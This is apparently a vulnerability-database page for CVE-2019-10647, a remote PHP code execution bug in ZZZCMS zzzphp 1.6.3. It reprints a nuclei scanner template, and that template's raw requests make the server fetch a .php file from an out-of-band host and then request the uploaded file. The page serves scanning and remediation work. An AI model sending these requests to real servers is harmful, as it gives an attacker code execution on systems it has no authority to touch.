CVE-2019-10647: ZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE)

日期: 2025-12-12 | 影响软件: ZZZCMS ZZZPHP | POC: 已公开

漏洞描述

ZZZCMS zzzphp v1.6.3 contains a remote code execution caused by lack of restrictions in inc/zzz_file.php, letting attackers execute arbitrary PHP code via a crafted URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter, exploit requires attacker to send malicious URL and server to serve PHP code as plain text.

PoC代码[已公开]

id: CVE-2019-10647

info:
  name: ZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE)
  author: Sourabh-Sahu
  severity: critical
  description: |
    ZZZCMS zzzphp v1.6.3 contains a remote code execution caused by lack of restrictions in inc/zzz_file.php, letting attackers execute arbitrary PHP code via a crafted URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter, exploit requires attacker to send malicious URL and server to serve PHP code as plain text.
  impact: |
    Attackers can execute arbitrary PHP code on the server, potentially leading to full system compromise.
  remediation: |
    Update to the latest version of ZZZCMS or apply security patches that restrict PHP file handling in inc/zzz_file.php.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-10647
    - https://github.com/kyrie403/Vuln/blob/master/zzzcms/zzzphp%20v1.6.3%20write%20file%20with%20dangerous%20type.md
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-10647
    cwe-id: CWE-434
    epss-score: 0.60335
    epss-percentile: 0.98188
    cpe: cpe:2.3:a:zzzcms:zzzphp:1.6.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: zzzcms
    product: zzzphp
  tags: cve,cve2019,rce,zzzphp,intrusive,file-upload,vuln,zzzcms,oast,oob,vkev

flow: http(1) && http(2)

variables:
  file: "{{randstr}}.php"

http:
  - raw:
      - |
        POST /plugins/ueditor/php/controller.php?action=catchimage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        source[]=http://{{interactsh-url}}/{{file}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains_all(body, "SUCCESS","state")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: filename
        regex:
          - '"title":"([^"]+)"'
        internal: true

  - raw:
      - |
        GET /upload/{{filename}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: status
        status:
          - 200
# digest: 4a0a0047304502210082c6f5a4672afc71bfa5df85c1680ca5cc95446e6438b06d96735bb48b0aba2202203ac617bf7dbdc12bc21a871faae2d2a0441f2d64cf23275b38a1342702adea39:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2019-10647.yaml

相关漏洞推荐